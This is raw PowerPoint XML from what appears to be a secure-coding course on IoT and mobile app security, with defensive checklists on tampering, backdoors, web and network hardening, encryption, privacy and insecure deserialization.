            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>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BF4A7480-CDC5-4009-BD0A-478824EF6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394F8B69-E5B6-43EE-BBFA-DAB9D8C91A75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264039" y="100013"/>
            <a:ext cx="8068592" cy="844550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent Code Tampering and Reverse Engineering (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4084402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72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1620725" y="1302040"/>
            <a:ext cx="7181350" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To avoid these defects:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detect at runtime whether code has been added or changed from the compiled package.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enable the app to react appropriately at runtime to a code integrity violation—for example, displaying a warning and shutting down the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement controls within the released code to prevent a debugger from being attached to the application's processes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use code-signing, such as checksums or hashes, to verify the integrity of code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide software controls to prevent unauthorized viewing and modification of the application's string tables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use code obfuscation in released code to make static code analysis more difficult.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="303544" y="100269"/>
            <a:ext cx="8099314" cy="844611"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent Code Tampering and Reverse Engineering (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="5253335"/>
            <a:ext cx="7526613" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Comprehensive list of recommendations on protecting against code tampering:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> https://www.owasp.org/index.php/Technical_Risks_of_Reverse_Engineering_and_Unauthorized_Code_Modification</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="183013" y="1387385"/>
            <a:ext cx="1358175" cy="1174293"/>
            <a:chOff x="183013" y="1241081"/>
            <a:chExt cx="1358175" cy="1174293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 2" descr="Image result for table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obil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Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14C35157-BAB2-49D6-B281-CB9F8A83E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82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Eliminate Extraneous Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1620724" y="1307130"/>
            <a:ext cx="7181351" cy="4935408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developers might include extra or hidden functionality in the released version of an app, which provides a back door that gives an attacker inappropriate access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples include noting a password within an included app resource, or disabling two-factor authentication during testing and leaving it disabled in the release version. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To avoid this defect:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform a manual secure code review.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look for hidden switches within the app's configuration settings.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Verify that no test code is included in the final production build.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Verify that all API endpoints are well documented and publicly available.</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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="183013" y="1387385"/>
            <a:ext cx="1358175" cy="1174293"/>
            <a:chOff x="183013" y="1241081"/>
            <a:chExt cx="1358175" cy="1174293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 2" descr="Image result for tabl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13" y="1241081"/>
              <a:ext cx="1358175" cy="816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obi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50" y="1699427"/>
              <a:ext cx="625459" cy="71594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Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F40BAD85-F737-440D-A07E-9E816DE91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965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57200" y="1121664"/>
            <a:ext cx="1371600" cy="1400835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057399" y="1143000"/>
            <a:ext cx="6744675" cy="5080000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web-based administrative consoles provided for managing IoT devices may include web vulnerabilities such as XSS, CSRF, and SQL Injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To avoid this defect, make sure web-based administrative consoles:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Are configured to install with the safest default settings, assuming that many users will not change the configuration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enable default user names and passwords to be changed, and prompt the user to do so upon first use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Require strong passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide an account lockout feature after a certain number of failed access attempts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not include common web vulnerabilities (XSS, CSRF, SQL injection, and so forth).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use HTTPS to protect transmitted information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use web application firewalls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide a means to receive upgrades and security fixes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adhere to all general patterns for preventing web </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>vulnerabilities.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74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide a Secure Web Interface</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B856E19-F665-4F9A-9405-997F4156B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173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199" y="1302040"/>
            <a:ext cx="6820875" cy="5143430"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network infrastructure supporting IoT devices is misconfigured and vulnerable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To avoid this defect:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use threat modeling to map the attack surface, and take all measures necessary to remove or disable unneeded services, protect required services, detect malicious activity, and react to an attack with measures such as lock-outs or temporary firewall rules.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not use Universal Plug and Play (UPnP) to make network ports and/or services available to the Internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure devices and network services are configured to minimize open network ports.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure devices and network services are protected against Denial of Service (DoS) attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use tested, proven, networking stacks and interfaces that handle exceptions gracefully.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable or protect all test or maintenance interfaces.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not expose unauthenticated protocols or channels, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>such as TFTP and Telnet.</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75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide Secure Network Services</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B6730531-6796-4880-8402-8DF9E4D57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27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199" y="1302040"/>
            <a:ext cx="6820875" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To ensure that data is protected while in transit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure all communication between system components is encrypted as well as encrypting traffic between the system or device and the Internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use encrypted protocols to protect data in transit, or encrypt data before transmitting it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use properly configured and up-to-date SSL/TLS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use standard, robust encryption protocols.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76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect Data in Transit</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EBF8E402-353C-42A4-93D0-DEB824741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81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302040"/>
            <a:ext cx="6820874" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To ensure that personal information and privacy are protected:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Minimize data collection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consult with data scientists and legal and compliance teams to determine risk of data collection and storage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide end users the option to specify what data will be collected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anonymize collected data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use encryption to protect all collected personal data at rest and in transit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that collected personal information is accessible only by authorized users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that a data retention policy is in place.</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77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect Privacy</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863A5598-0C8A-462F-BAAE-FB0479A41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574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199" y="1302040"/>
            <a:ext cx="6820875" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cloud APIs and web interfaces are vulnerable to attack. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mobile applications that manage or communicate with IoT devices are also vulnerable. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To avoid these defects:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Review all cloud and mobile interfaces for security vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement multi-factor authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Require strong, complex passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide an account lockout feature after a certain number of failed access attempts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that all cloud and mobile interfaces use transport encryption.</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78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide Secure Cloud and Mobile Interfaces</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7573852C-D9A8-4E84-96BE-F453993EA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073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199" y="1302040"/>
            <a:ext cx="6820875" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consumers may have different security requirements, and those requirements may change over time. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design IoT projects with secure defaults and allow consumers to select options to be enabled or disabled. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design systems to allow for the detection of malicious activity, as well as self-defending capabilities and a reaction plan should a compromise be detected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure your devices provide options to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control security logging capabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure alerts and notifications for security events.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select and configure encryption (e.g., enabling AES-256 when AES-128 is the default setting).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure security alerts for administrators and end users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control password security (such as enabling longer passwords or multi-factor authentication).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design products so improvements can be added to a system or </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>device through future releases, updates, and patches.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide Flexible Security Configuration</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9FCFFDCB-FFEB-4E88-993D-F1B700D5F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8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EBDC1-F3DB-4E4A-97A2-2A2F1C5F7291}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insecure Deserialization (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82099159-0EB2-4703-8CF1-DE35B489ABC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Serialization = take an object and turn it into string of bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bytes can be stored and transmitted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deserialization = reconstruct the bytes back into an object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Commonly used on web, mobile, and IoT platforms when you need to take an object "outside" your app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pickle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is used to serialize/deserialize data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pickle has a method called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__reduce__(self) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that can execute arbitrary code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Never use pickle to deserialize untrusted/unauthenticated data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prefer to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Similarly, do not call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>yaml.load </a:t>
